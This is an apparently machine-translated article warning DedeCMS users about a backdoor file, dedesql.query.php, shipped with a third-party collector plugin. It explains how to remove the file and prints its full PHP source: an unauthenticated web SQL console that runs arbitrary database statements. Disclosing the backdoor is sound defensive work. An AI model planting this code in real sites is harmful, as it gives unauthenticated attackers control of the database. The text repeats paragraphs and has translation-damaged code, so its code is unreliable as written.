DEDE collector master official left back door removal method
- 2020-03-31 21:27:30
- OfStack
Remove the official backdoor method: after installing the master collector, please immediately delete the dedesql.query.php file in the include directory. If the file has been installed, it may have been renamed arc.sqlquery.class.php. This file can be used to query the website database without login verification, and to update, delete, query data, and so on. You can also test yourself if, as I said, the method is:
Your domain name http://. Com/include/dedesql query. PHP. PHP? The dopost = viewinfo
Enter the above url, you can open the back door interface.
To be honest, the best thing you can do is not to use a backdoor program. The back door was found, and who knows if there will be more in the next so-called new version. The door file code is as follows:
Your domain name http://. Com/include/dedesql query. PHP. PHP? The dopost = viewinfo
Enter the above url, you can open the back door interface.
To be honest, the best thing you can do is not to use a backdoor program. The back door was found, and who knows if there will be more in the next so-called new version. The door file code is as follows:
<?php
require_once(dirname(__FILE__)."/../include/common.inc.php");
if(emptyempty($dopost))
{
$dopost = "";
}
if($dopost=="rename")
{
if(rename('dedesql.query.php','arc.sqlquery.class.php')){
echo " Success! ";
}else{
echo " Failure! ";
}
exit();
}
if($dopost=="viewinfo")
{
if(emptyempty($tablename))
{
echo " Table name not specified! ";
}
else
{
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);
$dsql->Execute('me');
$row2 = $dsql->GetArray('me',MYSQL_BOTH);
$ctinfo = $row2[1];
echo "<xmp>".trim($ctinfo)."</xmp>";
}
exit();
}
if($dopost=="index")
{
require_once(DEDEINC.'/arc.partview.class.php');
$envs = $_sys_globals = array();
$envs['aid'] = 0;
$pv = new PartView();
$row = $pv->dsql->GetOne('Select * From `#@__homepageset`');
$templet = str_replace("{style}",$cfg_df_style,$row['templet']);
$homeFile = dirname(__FILE__).'/'.$row['position'];
$homeFile = str_replace("//","/",str_replace("\","/",$homeFile));
$fp = fopen($homeFile,'w') or die(" Unable to update website home page to: $homeFile location ");
fclose($fp);
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet;
$pv->SetTemplet($tpl);
$pv->SaveToHtml($homeFile);
$pv->Close();
echo " Updated homepage successfully! ";
exit();
}
else if($dopost=="query")
{
$sqlquery = trim(stripslashes($sqlquery));
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery))
{
echo "<span style='font-size:10pt'> delete ' The data table ' or ' The database ' Is not allowed to be executed here. </span>";
exit();
}
if(eregi("^select ",$sqlquery))
{
$dsql->SetQuery($sqlquery);
$dsql->Execute();
if($dsql->GetTotalRow()<=0)
{
echo " run SQL : {$sqlquery} , no return record! ";
}
else
{
echo " run SQL : {$sqlquery} , a total of ".$dsql->GetTotalRow()." Bar record, maximum return 100 Article! ";
}
$j = 0;
while($row = $dsql->GetArray())
{
$j++;
if($j>100)
{
break;
}
echo "<hr size=1 width='100%'/>";
echo " Record: $j";
echo "<hr size=1 width='100%'/>";
foreach($row as $k=>$v)
{
echo "<font color='red'>{$k} : </font>{$v}<br/>rn";
}
}
exit();
}
if($querytype==2)
{
$sqlquery = str_replace("r","",$sqlquery);
$sqls = split(";[ t]{0,}n",$sqlquery);
$nerrCode = "";$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q=="")
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError());
if($errCode=="")
{
$i++;
}
else
{
$nerrCode .= " Perform: <font color='blue'>$q</font> Error, error prompt: <font color='red'>".$errCode."</font><br>";
}
}
echo " Successful execution {$i} a SQL Statement! <br><br>";
echo $nerrCode;
}
else
{
$dsql->ExecuteNoneQuery($sqlquery);
$nerrCode = trim($dsql->GetError());
echo " Successful execution 1 a SQL Statement! <br><br>";
echo $nerrCode;
}
exit();
}
if($dopost=="view")
{
;echo '<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>
<title>SQL Command line tool </title>
<link href='img/base.css' rel='stylesheet' type='text/css'>
</head>
<body background='img/allbg.gif' leftmargin='8' topmargin='8'>
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA">
<tr>
<td height="19" background="img/tbg.gif">
<table width="96%" border="0" cellspacing="1" cellpadding="1">
<tr>
<td width="24%"><strong>SQL Command runner: </strong></td>
<td width="76%" align="right"> <b><a href="sys_data.php"><u> The data backup </u></a></b>
| <b><a href="sys_data_revert.php"><strong><u> Data reduction </u></strong></a></b>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="200" bgcolor="#FFFFFF" valign="top">
<table width="100%" border="0" cellspacing="4" cellpadding="2">
<form action="" method="post" name="infoform" target="stafrm">
<input type='hidden' name='dopost' value='viewinfo' />
<tr bgcolor="#F3FBEC">
<td width="15%" height="24" align="center"> Table information of the system: </td>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="35%">
<select name="tablename" id="tablename" style="width:100%" size="6">
';
$dsql->SetQuery("Show Tables");
$dsql->Execute('t');
while($row = $dsql->GetArray('t',MYSQL_BOTH))
{
$dsql->SetQuery("Select count(*) From ".$row[0]);
$dsql->Execute('n');
$row2 = $dsql->GetArray('n',MYSQL_BOTH);
$dd = $row2[0];
echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>rn";
}
;echo ' </select>
</td>
<td width="2%"> </td>
<td width="63%" valign="bottom">
<div style="float:left;margin-right:20px;">
<input type="Submit" name="Submit1" value=" Optimization selection table " class="coolbg np" onClick="this.form.dopost.value='opimize';" />
<br />
<input type="Submit" name="Submit2" value=" Repair selected table " class="coolbg np" onClick="this.form.dopost.value='repair';" style="margin-top:6px;" />
<br />
<input type="Submit" name="Submit3" value=" View table structure " class="coolbg np" onClick="this.form.dopost.value='viewinfo';" style="margin-top:6px;" />
</div>
<div style="float:left">
<input type="Submit" name="Submit5" value=" Optimize all tables " class="coolbg np" onClick="this.form.dopost.value='opimizeAll';" />
<br />
<input type="Submit" name="Submit6" value=" Repair all tables " class="coolbg np" onClick="this.form.dopost.value='repairAll';" style="margin-top:6px;" />
</div>
</td>
</tr>
</table></td>
</tr>
<tr>
<td height="200" align="center"> Return message: </td>
<td>
<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe>
</td>
</tr>
</form>
<form action="" method="post" name="form1" target="stafrm">
<input type='hidden' name='dopost' value='query'>
<tr>
<td height="24" colspan="2" bgcolor="#F3FBEC"><strong> run SQL The command line:
<input name="querytype" type="radio" class="np" value="0">
Single line command (supports simple queries)
<input name="querytype" type="radio" class="np" value="2" checked>
Multi-line command </strong></td>
</tr>
<tr>
<td height="118" colspan="2">
<textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea>
</td>
</tr>
<tr>
<td height="53" align="center"> </td>
<td>
<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class='np' />
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</body>
</html>
';}
?>